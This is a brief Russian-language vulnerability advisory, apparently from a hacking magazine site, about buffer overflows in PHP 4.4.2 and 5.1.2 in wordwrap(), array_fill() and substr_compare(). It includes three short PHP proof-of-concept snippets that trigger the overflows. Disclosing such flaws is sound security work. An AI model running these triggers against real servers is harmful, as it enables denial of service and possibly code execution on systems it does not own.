Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа:
PHP 4.4.2
PHP 5.1.2
Удаленный пользователь может вызвать отказ в обслуживании или выполнить
произвольный код на целевой системе. Переполнение буфера обнаружено в функциях
wordwrap(),array_fill() и substr_compare(). Удаленный пользователь,
контролирующий входные параметры функций, может вызвать отказ в обслуживании или
выполнить произвольный код на целевой системе.
Примеры:
<?
$a = str_repeat ("A",438013);
$b = str_repeat ("B",951140);
wordwrap ($a,0,$b,0);
?>
<?array_fill (1,123456789,"Infigo-IS");?>
<?substr_compare ("A","A",12345678);?>